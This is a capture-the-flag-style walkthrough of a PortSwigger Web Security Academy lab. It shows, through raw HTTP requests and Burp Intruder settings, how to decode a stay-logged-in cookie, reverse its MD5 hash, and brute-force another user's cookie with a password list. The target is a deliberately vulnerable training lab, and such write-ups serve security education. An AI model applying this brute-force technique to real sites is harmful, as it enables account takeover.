Skip to content

Port Swigger Brute forcing a stay logged in cookie

Solution

Open the website: https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net/login

https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net/login
---
GET /login HTTP/2
Host: 0a46003c04ff8a52805c26e500b600db.web-security-academy.net
Cookie: session=MAnXuL1nxUExvudoCpZwWSLZPy20jbcS
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Login as user: wiener

L: wiener
P: peter
stay-logged-in=on (after reopen website wiener is still logged)
---
POST /login HTTP/2
Host: 0a46003c04ff8a52805c26e500b600db.web-security-academy.net
Cookie: session=MAnXuL1nxUExvudoCpZwWSLZPy20jbcS
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net
Referer: https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=wiener&password=peter&stay-logged-in=on
---
GET /my-account?id=wiener HTTP/2
Host: 0a46003c04ff8a52805c26e500b600db.web-security-academy.net
Cookie: session=C5SnWz908gYw2svl5zDAgzczIuEVfUXj; stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a46003c04ff8a52805c26e500b600db.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Base64 decode
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger]
└─$ echo "d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw" | base64 -d
wiener:51dc30ddc473d43a6011e9ebba6ca770                                                                                                                     
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger]
---
MD5 reverse
https://md5.gromweb.com/?md5=51dc30ddc473d43a6011e9ebba6ca770

51dc30ddc473d43a6011e9ebba6ca770 ==> peter

Bruteforce login, user: carlos

base64(username:md5[password])

Create rule:
hash: md5
add prefix: carlos
encode: base64-encode
passwordlist from here: https://portswigger.net/web-security/authentication/auth-lab-passwords
---

Edit request for user winer (after correct login)
---
Old request - user winer
___
GET /my-account?id=wiener HTTP/2
Host: 0a81006f0394e314802b26be00c7002d.web-security-academy.net
Cookie: session=PmyAP5YIarALnpYBas6U0mXHGkmKkc9g; stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a81006f0394e314802b26be00c7002d.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
Edit request for user carlos

Remove cookie session (NULL value)
Add wordlist of passwords
Add payload processing:
1) Hash: MD5
2) Add Prefix: carlos:
3) Base64-encode
___
GET /my-account?id=carlos HTTP/2
Host: 0a81006f0394e314802b26be00c7002d.web-security-academy.net
Cookie: session=; stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a81006f0394e314802b26be00c7002d.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
Found correct password for user
___
GET /my-account?id=carlos HTTP/2
Host: 0a81006f0394e314802b26be00c7002d.web-security-academy.net
Cookie: session=; stay-logged-in=Y2FybG9zOjFhMWRjOTFjOTA3MzI1YzY5MjcxZGRmMGM5NDRiYzcy
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a81006f0394e314802b26be00c7002d.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

Solved

L: carlos
P: pass